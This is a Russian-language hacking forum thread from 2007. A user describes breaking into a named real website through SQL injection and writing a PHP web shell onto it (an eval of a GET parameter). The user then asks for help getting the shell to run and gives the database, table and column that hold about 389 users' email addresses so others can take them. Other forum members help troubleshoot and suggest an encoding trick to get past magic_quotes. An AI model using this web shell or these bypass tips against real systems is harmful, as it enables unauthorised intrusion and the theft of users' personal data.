Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Сломал сайт, залил Php файл, а ничё не работает! |
09.01.2007, 02:21
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Сломал сайт, залил Php файл, а ничё не работает!
Хай! Вот нащёл сайт!
_http://jeux-mu-sacre-online.no-ip.org/
Нащёл в нём SQL Injection, выполнил команду
echo "<? eval(stripslashes($_GET[c])); ?>" > D:/wamp/www/info.php
Файл создался, но...
http://jeux-mu-sacre-online.no-ip.org/info.php?c=echo '123';
И ничего... В общем если кому удасться разобраться в чём проблема, раскажите  А БД можете себе брать, тама MSSQL в
БД: MuOnline
Таблица: MEMB_INFO
Колонка: mail_addr
Хранятся мыльники юзверей (я так понимаю их тама только 389  )
В общем очень интересно где скривили мои руки, почему сервер не слушает меня  |
|
|
09.01.2007, 02:43
|
|
Новичок
Регистрация: 05.09.2006
Сообщений: 18
Провел на форуме:
706223
Репутация:
42
|
|
А ты посмотри в сорсаx что делается  - "<? eval(stripslashes($_GET[c])); ?>" так в кавычкаx и осталось!!! |
|
|
|
09.01.2007, 02:46
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
ссылку на саму sql Injection!В студию.
|
|
|
|
09.01.2007, 03:02
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
sunb0rn, а без ковычек никак, ктомуже они на PHP никак не действуют! Как я буду использовать echo text > file если там символ > и в <? , ?> тоже эти символы...
Я так много раз делал, всё работало, а вот тут нехочет...
Последний раз редактировалось Ponchik; 09.01.2007 в 03:07..
|
|
|
|
09.01.2007, 03:20
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
sunb0rn, php код между тегами <? ?> в данном случае. все что до него и после - не важно.
Ponchik, посмотри код страницы) пхп не обрабатывается.
|
|
|
|
09.01.2007, 03:47
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Почему не обрабатывается... Еслиб не обрабатывался, нобы и выводил весь код страницы, а так всё фурычит... Странно... Мистикааааа! В общем можно забить на этот сайт...
|
|
|
|
09.01.2007, 03:51
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
не спорь ((=
|
|
|
|
09.01.2007, 04:04
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Позволь поспорить
http://img177.imageshack.us/img177/3940/screenshot0pg1.jpg
|
|
|
|
09.01.2007, 04:06
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
я про сайт :d
|
|
|
|
09.01.2007, 04:16
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
если magic_quotes=on то нихуя работать не будет. Можно обойти например echo(chr(0x56))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
